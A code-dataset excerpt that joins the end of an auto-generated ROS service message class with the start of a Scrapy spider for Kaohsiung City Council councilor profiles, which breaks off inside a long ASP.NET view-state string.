      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      pattern = '<%sb'%length
      start = end
      end += struct.calcsize(pattern)
      self.locMap.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.locMeta.name = str[start:end].decode('utf-8')
      else:
        self.locMeta.name = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      pattern = '<%sb'%length
      start = end
      end += struct.calcsize(pattern)
      self.locMeta.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
# Pre-compiled little-endian struct packers used by the response class above.
_struct_I = genpy.struct_I
_struct_B = struct.Struct("<B")
class RequestLocMap(object):
  """Service metadata binding the request/response message classes for rospy."""
  _type = 're_2dmap_extractor/RequestLocMap'
  _md5sum = 'ff776d365b44637e4e3b054f6c62341b'
  _request_class = RequestLocMapRequest
  _response_class = RequestLocMapResponse
| [
"flavius476@gmail.com"
] | flavius476@gmail.com |
2e4709fffd71fb1f3063ee6d4fb22fb9316304a7 | 995a74ba81cafedfbc37358e3aa68027420fee08 | /crawler/kcc/kcc/spiders/councilors.py | aeec24518703e57889f4df657437621d22615fc3 | [
"CC0-1.0"
] | permissive | inno-v/councilor-voter-guide | 21c0cb64f6ba814c397e455e14028abc092f8cb3 | f394cfaaeb83852b1feeef91bff08cbe29b15bb2 | refs/heads/master | 2021-01-21T03:31:16.850558 | 2014-09-10T15:29:38 | 2014-09-10T15:29:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,128 | py | # -*- coding: utf-8 -*-
import re
import urllib
from urlparse import urljoin
import scrapy
from scrapy.http import Request, FormRequest
from scrapy.selector import Selector
from kcc.items import Councilor
def GetDate(text):
    """Find a Minguo (ROC) calendar date in *text* — e.g. u'103年5月20日' or
    u'103.5.20' — and return it as an ISO 'YYYY-MM-DD' string (Gregorian year
    = ROC year + 1911). Returns None when no date is present."""
    found = re.search(
        u'(?P<year>\\d+)\\s*(年|[.])\\s*(?P<month>\\d+)\\s*(月|[.])\\s*(?P<day>\\d+)',
        text)
    if not found:
        return None
    return '%04d-%02d-%02d' % (
        int(found.group('year')) + 1911,
        int(found.group('month')),
        int(found.group('day')))
class Spider(scrapy.Spider):
    """Scrape Kaohsiung City Council councilor profiles for the 2010 term.

    The council site is an ASP.NET WebForms application, so selecting a
    council period/term requires simulating a postback (posting back the
    hidden __VIEWSTATE/__EVENTTARGET fields) instead of a plain GET.
    """
    name = "councilors_terms"
    allowed_domains = ["www.kcc.gov.tw"]
    start_urls = ["http://www.kcc.gov.tw/PeriodMembers/Search.aspx", ]
    # Be polite to the council server.
    download_delay = 0.5

    def start_requests(self):
        """POST the ASP.NET postback that selects period 7 / term id 36."""
        payload = {
            '__EVENTTARGET': 'ctl00$ContentPlaceHolder1$ddlPeriodTerms',
            '__EVENTARGUMENT': '',
            '__LASTFOCUS': '',
            # Opaque ASP.NET view state captured from the live search page;
            # the server expects it back verbatim.  It is split with implicit
            # string concatenation (the original kept it on one enormous
            # line, which had become line-wrapped and hence a syntax error);
            # the concatenated value is byte-identical.
            '__VIEWSTATE': (
                u'D8i/t9YnioJ6UcnJSYomiF3IN+/P75VSXy2Zi1gHOiHHzl3NkUO0DC8p2BegSFM0GeT56SQnWnZbAOhqqmQnQQgV46WdPOOvM48/wkk/vXhdOrkLwFq7RrF0sxCUcEek70lN9O3fLbbJUQFNnq0onlMaPk976r6GBVOZHRwtm9x7yJQaDFP7apY9TftGxo+SbTbGDGXxXmqnFE4vo4RCgWVjdoavaBU9ZN+mX7W78yigehS6m1h4txsU6ahXgSRFENulMSHhJrD8N9Cz+D/NSZf/5TUGKlIPRxtOiqBu0k4FQYcgDyPDkC35loztoek6dmAVMfqczzab29ihlgVZSDpGsS4XkzUOLU9KgbTQLctru8pUymzRpJowLN0r+PxvLeLD2YUy0/pt2hiN9bAolF5VXHntrLxtebRdxMtvJ+rU/dy9v1+nvxG0i80q9k7JKsyKK7quPXbLg/kGADc/XcTLJFbP8L2anuRR2eLqIpSyWo4NBYUqeBcsPWY6HQMpc/BEDd0rpzkHxL12XjlAA3p6zBKkksOMMPOu5X0pt+EJxIZ0bUknpHqC6LF5Dfr+Pln1SZ9np8Svi3WeWIYRaMCugzsUCdZeBAqIg4gUxYATOlz/xPSrwYy5Kw17k5K8LQAuh9OivPIGYw4mG4aAYnOE8frBG9KRyBbhUe7eqnTFCP7At8sDru1TJKyGNtxNVJ0sx/AVtg5OI/M0tmWD/DaiU1Df/oTu6zL1MNQLSljtCvjhf59sf9q4GUF8hTGhIiGRDQHgGlfNOOBs+aIewW/EvpZxHULlf9vsfY7dzej5Wc+LnjChQHrQmtdhpZeDK3t7OePt0bMRokxQwxKPmGDwgdRX0E8Pi0bpW8zLBCVRsSXQKZmfL1aay3zy9BHTAb5Bqxgf1CeOXhuH0rvuldJJRZseX8yy0db+lFXRLR9ma4p3y6Hf6kb+tt1zqKQgfSmntutcnNreBkF7s3T2Uh/ZhrF6F0WXfQkpOrpMPIBVYbxAJZxUeMtZIzlZKokytOZ3fcg3P4RN14hA8sH+TWtFAPNwucrgFRGfHCOtLCi5rdgZj7QuajgO8k+eY7nwOw7HP5NhUe67uaO/Q4dGXakJ7UGUNSzRQiw05gTdJEbU2aB8lTC2yt+dDwe5s8FxFUcp2vnTxa1uZsJQ0RyRKGqxoDRBdZY8iUlDiuOahx8/JShW1OA5BT4OK8ec9b4U0Ffc5ZBbgoiXYic9O2ax32c0PLyMyIe+WYMqVzI3CoEoYCe63/FmQDYFWdCdabHEnI47LwEX01eOdyvk9Jf4d3pRIV1ybvT26Y4VTTakkTfMB2hwVF43IKb7hs8U/sC2Ic3nDsh+6HPqGWtikkt5ly1wxCWH2cX608vGTz8Af7aAGUVUTlTy4+t9dqREPGYCQMb2WnlsRIaxtklnh51IrPeVMIyb0y6eI5C10KMopHVSpHBndEfmntB2Z7iGXbT0wtSMQHJOqm27q1ta04Vxonh1K0MnZXZYNsrJCfYlQS42CVrp6j4t8ojeSwZ/VUtQg/f7uPaV2xwsAlk6bTyqV9rBgErbpTKV80rUat2IIsDxhK74cqx1fEkKEvws6Z5GjWrAwvSbNrQVObF8SIN5BE1SgatscpyktFeeddb50K4sCmGY9X+dIjbRuK2TfdH1JlWmsugr/clnwuoC2DD6wc1jB/a7mAm82eSn/06MLpKReQGk60C4TXSxdSoBOPyuW0+9bnbmA2y7WZpGgWR4qm3XRwlWmj5RvWQ4BCZE/OKMYdT2e2490CAXvRnq1EnopDpqWh0IrFkwEBcRbFeai82jxDNoReF1vYMVCk+SjLxlD9vC4d19u1WOCnoqcNvQQjQpK2QMn2x8Lh7O78EirfexEAgbgyY47NM90X21p0HuIvCJ3JdcAr/FtUuCBcWoswh840wTJ7jqIzhQYBkcSaRGO8YPuHQMbjaKUAqJS6WvZRLxqqUf9IxahW8IcvL1'
                u'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'
                u'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'
                u'0lQZcGVUqcD3qo+ripEGSw8XQedsyl9OSiwvKMuQJsHoOD6OdTPis/6jzBsxf2gNpWEUWmz7HIdZUd5lv3m/4Fx3rgI8YEQBIxidmceNAADoL90Wr6q0vx5qKL6E9St5zOGIJF3B0j/tS8jvlkeCE5WScsspzu08aCAXD/8noGF/e0tA1yqVz30Kshsx5bxrytBOWICHAVNKyD4GSVQuMGpqu8pNzh+EX86JUpz7KVuaWEvyQvLPuMuBL96rY4SLvtWcQXoRUDNDKw0SQLGEy/iB7DUIQQG9BD9FIGTLjJIVnszH8VIU4U9upD/mgEhDvgFeY/82ZB90LVSme1ZiXirUrb6jB4TtSfUc2mdG3jVraqETP9kavBninAKKG69/DjwGIQ3iaBM85v8kXaE2KM81eWjws8Z1Q8Jw7WhFJNrs976eHMJN1qQoB8y57ZY3tmNDEd9U2W+5nKpfKiqAKpa83Lf2rcPGBANvhnDMtH03yASLaCzk3uiyfdNDep71y+bYWGrWgNmqwPU+NJEnbzFLzu760txkQ/d652pM/qkKiZ/5ucPK7+9dynBrRaKXbVH/8SZVx15wm7fI5qirwhVGN6B1IGCPcifzYMjcpidnCI18/Ys7QbqFjdZjf5VlnCEVPyiN0Kbp5RnSt3NUELsOYWIuuGQX7uFh59jRuNZs5xbuCI1kQJ32d7NcGn2evkYwSREhH4uiojivGP2EjZ2YdbMvgTLm0wVXtM8B/NgM2VP8+Id0U3db7lGFq9PAIRtI6k3Wn3hI5eSz5IxmIoGsdL29g2IIq+7whH4BX9UemLV0NyAIXw9fS0HYLppqwr2rkUcuj+AHLdXGcxFRKq2HXrqDLt1jxPdHJUtAF6O5ghR0azAYiCuzo0ZZ2osxOgBu9DAzobcXyMChAtsvYbquhK/s5nlG9u4tpi8Ay+fsETuj9ag68Mxv/4FBR8s193roy8PRyasba16gIoYGvDaS80UjvfsAH9Di37vu0Rbq+LMr6PdyyTBmRpKo1aDRlSEAT4SoukeLNgYPQ7vy5dFKaPuRclO2cV3blbCft2Td38iCGTgTXDguFZRuBG779jewnhbGLHU0e+G1PB1BYb84xi1EEmW7gPrM6eSgNKCtuERzeodBpTRDKPKrTu9g/rSMyxFm4eOChjnosWxgPo6uQnaFYCe6yGfE5KSVYsW2t+AgkUBIVia3jGtQdhEuMZ06mx4Rrbk0cFhBfitH9sZnkiXrRGMexmj4jIeNa4ygS+HolOQxuNEeAgtGznK2nm3arj4Jqvq12J/DQrShDnA0xXU15DLmHzzTJ71SDaUtNMnfZSnRJwEfDcamX7hGYST0leTgkTLr5Y0P62sCipX1O+qGkY4kmjKMnjgY3AOcDqeLw3Iy/pmJsAzQU7cHIcIPW6czgNlmw3PVr5PEtQS17xYpz81kDyLlvT5THTrBDncwiMAWwK6NrvSORalfOEboaDpgwyjq19/b+28So1O6CRAGJQEraJJvI0zbgXzwd/gMng5fn3myE1BuDv3J7MoeoX2PQ9+fraQDO2yJrB4j5922mDHomufuwuoueunIEQ9n6V047XCdiFWr/GfBOyOGbRhbDQ/A/QRLstAZm/YkmafLmq5kPuKer1DbnBmIBcz5sm4iHSBYFI4lqrAY1EUQmW5W51URPUhOmMjtFZjuGc6ZUlwCnj1elhxUMF/Ea4XTPtcvvdF+BamJDT/n7Lc7Wvh7LwQWqA3YHEvwSqb4JJiTm/v3PTrr2v8DqEHAtBMSe/GQisZuDJdR1XX/V5W6QKBYormhCIGgIAuC+yHG2XHjQh5hdq6hOPEeUMlmSealy4VOM3ZXJkcW2gh3DsG9Jkk1CqME67Nh/XP8CShYgFsTwgC5u4fnB9TccQIAgO2bQC4vlyCVLbXmeWQF508N0/E4JIKk6PC/oi/teMHzxlYbXJHxXOPqP+ETCxLoj8xwoISqavepzmnRatLvAjzt91aljm+t6Nu4'
                u'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'
                u'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'
                u'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'
